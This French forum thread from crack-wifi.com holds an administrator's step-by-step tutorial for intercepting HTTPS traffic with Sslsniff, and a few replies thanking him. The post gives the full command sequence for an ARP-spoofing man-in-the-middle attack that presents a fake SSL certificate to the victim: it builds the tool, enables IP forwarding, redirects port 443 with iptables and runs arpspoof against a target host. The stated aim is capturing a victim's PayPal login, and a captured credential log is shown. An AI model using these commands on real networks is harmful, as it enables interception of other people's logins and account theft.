Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-05-2009 04:35:48

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 355

Sslsniff: https man in the middle (SSL hijacking)

En complément au Tutoriel Utilisation de Sslstrip pour une attaque man in the middle sur du https (SSL), arpspoof et hack paypal, voici un autre tool du meme auteur qui permet de s'attaquer au https. En fait, Sslsniff est l'ancetre de Sslstrip, il a été rendu public par Moxie Marlinspike en 2002. Son fonctionnement est quelque peu différent de Sslstrip, en effet Sslsniff va présenter au navigateur un faux certificat SSL:

schema-fonctionnement-sslsniff.png
Image taille réelle ici.

Voila en résumé le fonctionnement du soft:

-Coté client
il intercepte le trafic https
il génère un certificat pour le site sur lequel le client est connecté
il signe avec un certificat de notre choix
il fait transiter les données a travers le proxy

-Coté serveur
il se connecte normalement en https au serveur
il envoie et reçoit les données normalement comme si il était le client

Bien sur entre les deux les données transitent en clair et on peut les sniffer...

Vous trouverez Sslsniff sur le site de son auteur: thoughtcrime.org. Allez, on est parti pour notre petit exemple, la récupération d'un acompte paypal avec un faux certificat SSL. On commence par télécharger et installer le tool:

cd /root/Desktop/sslsniff (j'ai créé un dossier sslsniff sur le desktop)
wget http://www.thoughtcrime.org/software/sslsniff/sslsniff-0.5.tgz
tar -zxvf sslsniff-0.5.tgz
cd /root/Desktop/sslsniff/sslsniff-0.5
make

Le soft est en place, voici les options:

Usage: sslsniff [options]

Required Options:
-c <file>       File containing valid certificate and private key
-p <port>       Port to listen on

Optional Options:
-d              Directory to put log files (defaults to ".")
-m              Sign certificates using MD5 (defaults to SHA-1)
-P              Only log HTTP POSTs

Le principe est d'utiliser un faux certificat SSL (fichier .crt), le tool en contient un nommé trust.crt. Vous pouvez aussi utiliser le certificat SSL de webmitm (un outil de la suite dsniff inclu dans Backtrack et qui sert également à faire du mitm sur du https), il se trouve ici: /pentest/fuzzers/spike/src/webmitm.crt (si vous n'avez jamais utilisé webmitm, vous devrez d'abord le lancer afin de générer le certificat). Vous pouvez aussi générer vos propres certificats avec openssl. Quoi qu'il en soit, vous aurez beaucoup de mal à obtenir un certificat valide (et pour cause!), mais l'attaque peut tout de meme réussir. On teste cela:

sslsniff -p 14999  -c /root/Desktop/sslsniff/sslsniff-0.5/trust.crt -d /root/Desktop/sslsniff/sslsniff-0.5/logs

Voila Sslsniff qui démarre:

bt sslsniff-0.5 # sslsniff -p 14999  -c /root/Desktop/sslsniff/sslsniff-0.5/trust.crt -d /root/Desktop/sslsniff/sslsniff-0.5/logs
sslsniff 0.5 [SHA1 Mode] initialized and listening on 14999...

Le serveur est en écoute sur le port 14999, pret à enregistrer les informations dans le fichier logs.

Un petit coup d'ip forward et une redirection iptables depuis le port 443 (port par défaut du https) vers notre port 14999 (celui sur lequel Sslsniff est en écoute) est nécessaire pour que tout soit fonctionnel:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 14999

On peut maintenant lancer le mitm:

arpspoof -i eth0 -t 192.168.1.25 192.168.1.1

Comme d'habitude, nous avons ici l'adresse ip de la machine cible (192.168.1.25) et celle du routeur (192.168.1.1).

Du coté du client, le surf sur du https affiche différents messages d'alerte en fonction du navigateur utilisé:

-Internet explorer

certificat-ssl-expire-ie.png
Image taille réelle ici.

-Firefox

erreur-certificat-paypal.png
Image taille réelle ici.

ou bien

certificat-paypal-expire.png
Image taille réelle ici.

Sous, Ie, voici les informations que l'on obtient quand on veut en savoir plus sur mon certificat SSL bidon:

infos-certificat-paypal-fake.png
Image taille réelle ici.

Vous etes prévenus: selon le certificat que vous allez utiliser, et selon le navigateur de la machine "victime", ça risque de donner de bons gros messages d'alerte ainsi que quelques bugs!

Dans le cas de mon test, la machine victime est allé se connecter sur paypal. Avec certains certificats c'était ok, mais avec un certificat foireux et un navigateur un peu trop "secure" voila ce que ça peut donner:

erreur-affichage-avec-faux-certificat.png
Image taille réelle ici.

L'affichage est franchement buggy et ça sent clairement l'embrouille. En tout cas, du coté de l'attaquant le login a bien été intercepté:

sslsniff-intercept-login.png
Image taille réelle ici.

Et on retrouve les informations dans le fichier logs:

login_cmd=&login_params=&login_email=[email protected]&login_password==super-mot-de-passe&target_page=0&submit.x=Connectez-vous&form_charset=UTF-8HTTP/1.1 200 OK
Date: Thu, 30 Apr 2009 17:41:39 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_login-submit; domain=.paypal.com; path=/
Set-Cookie: consumer_display=USER_HOMEPAGE%3d2%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d5; expires=Fri, 30-Apr-2010 17:41:56 GMT; domain=.paypal.com; path=/
Set-Cookie: login_email=test%40test.com; expires=Tue, 27-Oct-2009 17:41:56 GMT; domain=.paypal.com; path=/
Set-Cookie: navlns=0; expires=Wed, 25-Apr-2029 17:41:56 GMT; domain=.paypal.com; path=/
Set-Cookie: feel_cookie=a%2013%20_login-submit%20b%200%20%20c%206%20webscr%20d%200%20%20e%2033%20Merchant%2fwax%2fWaxErrorOccurred.xsl%20f%200%20%20g%205%20fr_FR%20h%200%20%20i%2019%20p%2fxcl%2fpay%2fwax_error%20j%200%20%20k%2023%20Page%20Not%20Found%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/
Set-Cookie: Apache=10.191.114.13.1241113299744620; path=/; expires=Wed, 18-Mar-03 11:13:23 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Pour résumer, attention à ne pas utiliser de certificat trop foireux, si vous voulez utiliser sslsniff prenez bien le temps de tester ce que ça donne avec différents certificats, et regardez le résultat sur différents navigateurs.

Si vous avez des commentaires ou des conseils pour générer un certificat SSL, n'hésitez pas à poster wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-05-2009 07:53:54

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : Sslsniff: https man in the middle (SSL hijacking)

j'aime bien se genre d'outils ,je suis tres interresser par les risques de la navigation sur le web.

merci M1ck3y


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#3 01-05-2009 08:43:26

perex
Membre
Inscription : 26-08-2008
Messages : 20

Re : Sslsniff: https man in the middle (SSL hijacking)

Merci M1ck3y,  je v tester ça wink


"Not how to hack but hack to learn"

Hors Ligne

#4 01-05-2009 09:02:11

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 355

Re : Sslsniff: https man in the middle (SSL hijacking)

Si vous devez vous lancer dans les tests, vous devriez tester d'abord Sslstrip en suivant le tuto: Utilisation de Sslstrip pour une attaque man in the middle sur du https (SSL), arpspoof et hack paypal, franchement il est vraiment impressionnant cet outil! big_smile

Après, vous pourrez toujours tester Sslsniff pour vous familiariser avec les manipulations de certificats SSL...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
DNS spoofing + https par guillaume
0 638 04-01-2016 23:58:43 par guillaume
2 1561 04-07-2014 19:43:45 par flatounet
8 1732 20-04-2014 12:25:39 par antares145
3 1607 13-03-2014 22:49:00 par shaft92
8 2519 26-11-2013 00:05:15 par coyotus

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]